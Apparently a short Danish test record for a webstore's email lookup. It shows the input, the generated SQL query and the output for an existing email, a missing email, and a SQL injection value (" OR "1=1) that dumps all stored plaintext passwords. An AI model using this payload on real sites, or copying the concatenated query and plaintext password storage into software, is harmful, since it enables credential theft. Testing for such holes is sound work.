Email adresse findes i databasen

Input:

E-mail: TestBruger1@test.dk
SELECT Password FROM h_christensen_dk_db_webstore.Users WHERE Email="TestBruger1@test.dk"

Output:

Password1

Email adresse IKKE findes i databasen

Input:

E-mail: TestBr@test.dk
SELECT Password FROM h_christensen_dk_db_webstore.Users WHERE Email="TestBr@test.dk"

Output:

SQL injection

Input:

E-mail: Findes_ikke" OR "1=1
SELECT Password FROM h_christensen_dk_db_webstore.Users WHERE Email="Findes_ikke" OR "1=1"

Output:

Password1
password1234